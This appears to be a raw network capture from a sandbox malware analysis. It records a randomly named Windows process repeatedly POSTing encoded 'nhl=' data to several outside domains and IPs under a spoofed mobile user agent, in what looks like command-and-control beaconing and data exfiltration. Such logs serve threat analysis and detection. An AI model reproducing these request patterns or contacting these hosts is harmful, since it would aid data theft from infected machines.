Session ID: 7 | Source: 192.168.11.30:49828 | Destination: 103.255.237.233:80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Oct 9, 2024 13:03:06.408952951 CEST | 3771 bytes | OUT
POST /zxna/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.languyenthuyduyen.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.languyenthuyduyen.xyz
                                                                                                                                                                Referer: http://www.languyenthuyduyen.xyz/zxna/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 65 36 69 35 4f 78 55 41 37 53 66 79 4d 59 32 67 4e 68 34 2f 46 30 71 7a 78 43 31 42 6d 47 33 4d 47 2b 35 4c 2f 64 4a 65 75 78 76 4f 44 67 4a 59 2b 65 59 64 38 30 39 43 71 31 41 2f 41 59 63 31 32 70 77 68 56 2f 66 51 64 78 62 43 33 77 74 37 45 37 77 47 69 52 30 5a 5a 6e 4f 31 64 6d 7a 4c 66 70 55 37 79 77 4c 62 56 67 76 42 4b 72 71 59 62 34 79 2b 44 75 45 5a 76 63 5a 35 76 4a 63 6e 2f 4a 69 41 63 63 72 37 46 77 53 51 54 38 6c 63 36 76 34 68 33 46 79 76 79 56 41 4f 44 30 49 78 44 49 43 4a 31 6a 35 79 6b 5a 53 37 6a 45 63 44 7a 78 71 64 55 46 6a 74 78 54 43 79 79 2f 6c 56 73 67 4e 58 70 78 78 59 43 35 78 5a 45 4c 50 41 4e 5a 31 75 6e 36 73 39 47 6b 36 43 31 2f 6e 6f 62 6a 61 52 74 59 79 35 47 51 2b 64 74 52 4c 44 37 65 6f 53 34 54 58 72 70 71 56 4f 30 4f 2b 47 42 38 68 48 30 71 2f 30 5a 65 67 63 34 59 52 6b 4d 57 46 64 78 63 35 33 59 77 4f 76 68 49 7a 43 2f 42 62 66 37 79 4c 50 78 37 33 62 7a 39 2f 70 2f 6a 75 59 73 34 62 56 49 6c 54 72 52 4b 6d 4c 50 71 32 31 75 74 68 4f 5a 47 71 6d 61 4f [TRUNCATED]
Data Ascii: nhl=[TRUNCATED]
Oct 9, 2024 13:03:06.776392937 CEST | 959 bytes | IN
HTTP/1.1 302 Found
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:06 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 683
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.30 | 49829 | 103.255.237.233 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:09.307612896 CEST | 355 | OUT | GET /zxna/?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2VdCpkOUvznzx121WAOLhD3akGih7YK2UBiYRo2lJdrH1gL64cuqcjDePyZUHX/QJDU8k+qCwrYmvEQGfXWN0kwHy8MBDYStPNdJHxaZ4= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.languyenthuyduyen.xyz
Connection: close
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:03:09.672271967 CEST | 1104 | IN | HTTP/1.1 302 Found
Server: openresty
Date: Wed, 09 Oct 2024 11:03:09 GMT
Content-Type: text/html
Content-Length: 683
Connection: close
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2VdCpkOUvznzx121WAOLhD3akGih7YK2UBiYRo2lJdrH1gL64cuqcjDePyZUHX/QJDU8k+qCwrYmvEQGfXWN0kwHy8MBDYStPNdJHxaZ4=
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.30 | 49830 | 104.21.77.69 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:14.910942078 CEST | 625 | OUT | POST /x7ji/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.bayarcepat19.click
Cache-Control: max-age=0
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.bayarcepat19.click
Referer: http://www.bayarcepat19.click/x7ji/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Ascii: nhl=YZ/YUfwmLA2lJPhiodRkXs8LEZ++m0V3FSuf7nD83f98/Py+QvR6trLmdracFAjoQaE4zYnuPL9+UPq+ZWli3L+/7aYO2tWqPwlrjuazKByNlNTSecz1x/Oio6iw6+FJjHqWzJoeZcwKdopcxYMDfqi7znzzuDJHsy0Oz5L3M2r9xnUANpqUE+6jPMXCgCOWbw==
Oct 9, 2024 13:03:15.016858101 CEST | 820 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 09 Oct 2024 11:03:14 GMT
Content-Type: text/html
Content-Length: 167
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 09 Oct 2024 12:03:14 GMT
Location: https://www.bayarcepat19.click/x7ji/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oIXNRd1umUVT8MuTBl9DuAg6GKNX1Zct88NKyjS0gK61bjcOvXK99koxicQg98XYPBlXnIaySd4yIhvAjrp54Pu%2FbVg836HRZUnHClEjdj4JcV5oqo5UXrNr9CMnTNmQZo1HJhGV37ur"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 8cfde20e7bd40f8b-EWR
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.30 | 49831 | 104.21.77.69 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:17.540601015 CEST | 645 | OUT | POST /x7ji/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.bayarcepat19.click
Cache-Control: max-age=0
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.bayarcepat19.click
Referer: http://www.bayarcepat19.click/x7ji/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Ascii: nhl=YZ/YUfwmLA2lPrlile5kGc8UYp++zkVzFSqf7mHS3MJ88vi+RuR6urLmF7aVaQjzQb5FzazuPLB+UKO+Ynllt7+5z6YAytWqPwlrjuOVKHaNl9DSf9z0tvOlt6iwoOEAjHqOzLd7ZfIKdtNcxNgcRqiH3nyH+ikKghwlzeXpE0+A9QlaQqeWXeGOTN6qiAPNG/gDb2DFoI1N3ubTzpj8S40=
Oct 9, 2024 13:03:17.652224064 CEST | 828 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 09 Oct 2024 11:03:17 GMT
Content-Type: text/html
Content-Length: 167
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 09 Oct 2024 12:03:17 GMT
Location: https://www.bayarcepat19.click/x7ji/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nAOwH7hJE2dp2p0J4M5%2FBjuxfcKiRog8rZzcNLNz5JjTwquGDGyV%2FczC5JnNz%2FHuuZpFDiSOBCDEqkba5cFvvGHYqH0W2RRBlFbwsBHx6LkLKNegKQEa7mKkjS1Sm%2Br677T%2FDiGtAroZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 8cfde21eee9f8cd4-EWR
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.30 | 49832 | 104.21.77.69 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:20.179485083 CEST | 1289 | OUT | POST /x7ji/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.bayarcepat19.click
Cache-Control: max-age=0
Content-Length: 3336
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.bayarcepat19.click
Referer: http://www.bayarcepat19.click/x7ji/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Ascii: nhl=
Oct 9, 2024 13:03:20.179537058 CEST | 2473 | OUT | (second segment of the POST body)
Oct 9, 2024 13:03:20.286434889 CEST | 856 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 09 Oct 2024 11:03:20 GMT
Content-Type: text/html
Content-Length: 167
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 09 Oct 2024 12:03:20 GMT
Location: https://www.bayarcepat19.click/x7ji/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2FlCbDMB%2Fej0mLBMv%2FYMVpqLRIYbDoDckeg5nP9KHAJ756LE%2FgdIM4cuj4A665sH4RUNcgAMTfRyCeNE8pnQy2LwZ8FSG41o7QgzxhaALVCQ3R5giii3lhEPTnmHqDc6YRUFktG5iyAY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 8cfde22f6eb332e2-EWR
alt-svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.30 | 49833 | 104.21.77.69 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:22.800280094 CEST | 352 | OUT | GET /x7ji/?nhl=VbX4XoU1axPwTLIf98pUGPIzQL60g31CACrHzmj3o8Yh1t/lPrcBk6uAM4jdHwr2Bp5gqY7NYKc3aa2dAjtLrrS76KgS6f/xOF9OiJ7sHgK1x6zEV9Cyr40=&9X=EvKH2xeP-DpP307P HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.bayarcepat19.click
Connection: close
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:03:22.910089970 CEST | 995 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 09 Oct 2024 11:03:22 GMT
Content-Type: text/html
Content-Length: 167
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 09 Oct 2024 12:03:22 GMT
Location: https://www.bayarcepat19.click/x7ji/?nhl=VbX4XoU1axPwTLIf98pUGPIzQL60g31CACrHzmj3o8Yh1t/lPrcBk6uAM4jdHwr2Bp5gqY7NYKc3aa2dAjtLrrS76KgS6f/xOF9OiJ7sHgK1x6zEV9Cyr40=&9X=EvKH2xeP-DpP307P
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltU7eQEOt4%2BPqPNxvFTLwxIWnsaSwzvLLEhHbTZFNpkTUcVUIw2y1RI9r65jbh2j%2FCiifdUKlhbfSrblTy85CWmmuI%2FIiuHxvmyl6C5jdKhjoyl1%2FQtfUA0%2BvIp818t8ZvAT%2BHZO0qZg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Speculation-Rules: "/cdn-cgi/speculation"
Server: cloudflare
CF-RAY: 8cfde23fcaed8c5f-EWR
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.30 | 49834 | 65.21.196.90 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:28.574872971 CEST | 610 | OUT | POST /f06i/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.030002304.xyz
Cache-Control: max-age=0
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.030002304.xyz
Referer: http://www.030002304.xyz/f06i/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 74 33 6b 79 32 4f 37 4a 4c 6d 46 64 32 51 49 43 43 51 69 4b 52 62 74 31 68 6d 6f 34 4d 31 53 75 58 5a 7a 38 38 54 74 33 74 33 2f 6d 6a 31 6e 59 32 74 4a 31 42 6f 43 67 44 37 33 4b 76 55 4f 6c 73 6a 57 4d 45 65 55 53 76 52 78 41 73 53 43 39 76 52 4a 48 44 63 75 35 74 6a 76 4c 66 4e 69 30 58 74 4f 67 66 78 63 47 46 78 32 31 37 38 2b 69 4a 71 48 65 4a 73 32 65 4f 31 4a 61 5a 47 7a 47 51 65 74 65 64 72 66 33 78 2b 58 66 48 44 53 4a 6a 4d 54 4f 74 55 4b 37 69 76 39 64 77 2f 62 46 7a 59 4e 6a 55 79 59 39 68 33 34 44 4a 6b 5a 70 56 61 66 65 51 45 7a 52 48 4d 4d 2b 74 65 38 72 74 67 3d 3d
Data Ascii: nhl=t3ky2O7JLmFd2QICCQiKRbt1hmo4M1SuXZz88Tt3t3/mj1nY2tJ1BoCgD73KvUOlsjWMEeUSvRxAsSC9vRJHDcu5tjvLfNi0XtOgfxcGFx2178+iJqHeJs2eO1JaZGzGQetedrf3x+XfHDSJjMTOtUK7iv9dw/bFzYNjUyY9h34DJkZpVafeQEzRHMM+te8rtg==
Oct 9, 2024 13:03:28.767903090 CEST | 1032 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Wed, 09 Oct 2024 11:03:28 GMT
vary: User-Agent
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.30 | 49835 | 65.21.196.90 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:31.305915117 CEST | 630 | OUT | POST /f06i/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.030002304.xyz
Cache-Control: max-age=0
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.030002304.xyz
Referer: http://www.030002304.xyz/f06i/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 74 33 6b 79 32 4f 37 4a 4c 6d 46 64 35 51 59 43 42 7a 4b 4b 5a 62 74 30 71 47 6f 34 47 56 53 71 58 5a 76 38 38 57 56 6e 73 46 4c 6d 6a 58 50 59 34 4a 39 31 49 34 43 67 4c 62 33 50 68 30 4f 2b 73 6a 62 76 45 65 59 53 76 53 4e 41 73 58 6d 39 76 67 4a 47 52 38 75 37 72 6a 76 56 43 39 69 30 58 74 4f 67 66 78 4a 74 46 77 65 31 34 4d 75 69 4a 50 7a 5a 41 4d 32 64 59 6c 4a 61 64 47 7a 4b 51 65 73 39 64 70 37 52 78 34 54 66 48 44 69 4a 69 5a 2f 50 6a 55 4b 39 76 50 38 72 2b 37 43 76 2b 4b 6c 75 65 79 6b 47 75 6e 49 65 49 7a 6f 7a 49 5a 72 63 44 6b 50 38 62 4e 68 57 76 63 39 77 77 67 59 30 54 6e 33 2f 34 5a 61 49 6d 62 45 72 6b 78 71 32 43 6f 34 3d
Data Ascii: nhl=t3ky2O7JLmFd5QYCBzKKZbt0qGo4GVSqXZv88WVnsFLmjXPY4J91I4CgLb3Ph0O+sjbvEeYSvSNAsXm9vgJGR8u7rjvVC9i0XtOgfxJtFwe14MuiJPzZAM2dYlJadGzKQes9dp7Rx4TfHDiJiZ/PjUK9vP8r+7Cv+KlueykGunIeIzozIZrcDkP8bNhWvc9wwgY0Tn3/4ZaImbErkxq2Co4=
Oct 9, 2024 13:03:31.497334957 CEST | 1032 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Wed, 09 Oct 2024 11:03:31 GMT
vary: User-Agent
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.30 | 49836 | 65.21.196.90 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:03:34.045150042 CEST | 2578 | OUT | POST /f06i/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.030002304.xyz
Cache-Control: max-age=0
Content-Length: 3336
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.030002304.xyz
Referer: http://www.030002304.xyz/f06i/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 74 33 6b 79 32 4f 37 4a 4c 6d 46 64 35 51 59 43 42 7a 4b 4b 5a 62 74 30 71 47 6f 34 47 56 53 71 58 5a 76 38 38 57 56 6e 73 46 7a 6d 67 6d 76 59 33 4f 68 31 53 34 43 67 46 37 33 4f 68 30 4f 7a 73 6a 43 6d 45 65 46 76 76 55 42 41 71 30 65 39 6d 31 70 47 62 38 75 37 6d 44 76 55 66 4e 6a 30 58 72 76 70 66 78 5a 74 46 77 65 31 34 50 47 69 5a 4b 48 5a 47 4d 32 65 4f 31 4a 4f 5a 47 7a 6d 51 65 30 44 64 70 2b 73 78 36 7a 66 48 78 61 4a 6a 76 72 50 6a 55 4b 39 30 2f 38 32 2b 2b 61 75 2b 4c 4e 79 65 7a 73 77 70 58 63 65 4a 33 4a 53 56 59 43 4b 51 46 76 49 47 2f 5a 79 6d 63 70 37 32 78 70 4a 53 56 48 47 70 61 36 76 6a 39 51 2b 68 68 76 78 64 4d 50 6e 48 63 6e 6e 6b 63 6c 6c 31 6e 30 38 70 59 7a 57 4a 41 55 6c 70 58 46 72 4d 64 63 66 6a 78 71 77 42 6d 71 50 34 6c 55 56 53 57 35 45 36 37 41 65 64 6a 57 31 56 66 4e 47 63 48 42 59 57 52 75 34 50 64 78 7a 62 38 62 78 6c 62 64 70 67 38 74 6c 44 62 51 7a 73 58 65 4d 2f 34 49 6a 30 6c 33 6e 6b 46 7a 5a 53 50 33 4e 6f 30 6c 7a 46 53 57 74 72 41 4b 57 64 4a [TRUNCATED]
